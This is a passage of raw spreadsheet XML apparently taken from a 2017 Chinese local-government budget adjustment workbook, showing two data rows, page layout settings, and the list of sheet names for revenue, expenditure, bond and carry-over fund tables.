      <c r="A172">
        <v>231</v>
      </c>
      <c r="B172" s="1" t="s">
        <v>643</v>
      </c>
      <c r="C172" s="1" t="s">
        <v>216</v>
      </c>
      <c r="D172" s="51">
        <v>7057.275447</v>
      </c>
      <c r="E172" s="1"/>
      <c r="F172" s="1"/>
      <c r="G172" s="1">
        <v>5310</v>
      </c>
      <c r="H172" s="1">
        <v>8352</v>
      </c>
      <c r="I172" s="1"/>
    </row>
    <row r="173" spans="1:9">
      <c r="A173">
        <v>231</v>
      </c>
      <c r="B173" s="1" t="s">
        <v>644</v>
      </c>
      <c r="C173" s="1" t="s">
        <v>524</v>
      </c>
      <c r="D173" s="51">
        <v>250</v>
      </c>
      <c r="E173" s="1"/>
      <c r="F173" s="1"/>
      <c r="G173" s="1">
        <v>250</v>
      </c>
      <c r="H173" s="1">
        <v>250</v>
      </c>
      <c r="I173" s="1"/>
    </row>
  </sheetData>
  <autoFilter ref="B4:J173"/>
  <mergeCells count="2">
    <mergeCell ref="B2:E2"/>
    <mergeCell ref="E3:F3"/>
  </mergeCells>
  <phoneticPr fontId="10" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.15625" right="0.15625" top="0.78680555555555598" bottom="0.59027777777777801" header="0.51180555555555596" footer="0.51180555555555596"/>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6</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="17" baseType="lpstr">
      <vt:lpstr>收支总表</vt:lpstr>
      <vt:lpstr>收入调整</vt:lpstr>
      <vt:lpstr>一般预算收入</vt:lpstr>
      <vt:lpstr>2017年支出调整项目 (2)</vt:lpstr>
      <vt:lpstr>政府性基金预算调整表</vt:lpstr>
      <vt:lpstr>中期预算支出调整汇总表</vt:lpstr>
      <vt:lpstr>地方政府债券资金安排表（附表1）</vt:lpstr>
      <vt:lpstr>2016年结转结余资金安排情况表（附表2）</vt:lpstr>
      <vt:lpstr>专项资金追加预算安排表（附表3）</vt:lpstr>
      <vt:lpstr>XNXSYMSQ</vt:lpstr>
      <vt:lpstr>EPMLXJTX</vt:lpstr>
      <vt:lpstr>'2017年支出调整项目 (2)'!Print_Area</vt:lpstr>
      <vt:lpstr>一般预算收入!Print_Area</vt:lpstr>
      <vt:lpstr>'2016年结转结余资金安排情况表（附表2）'!Print_Titles</vt:lpstr>
      <vt:lpstr>'2017年支出调整项目 (2)'!Print_Titles</vt:lpstr>
      <vt:lpstr>收支总表!Print_Titles</vt:lpstr>
      <vt:lpstr>'专项资金追加预算安排表（附表3）'!Print_Titles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2017-11-02T09:18:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-13T09:58:59Z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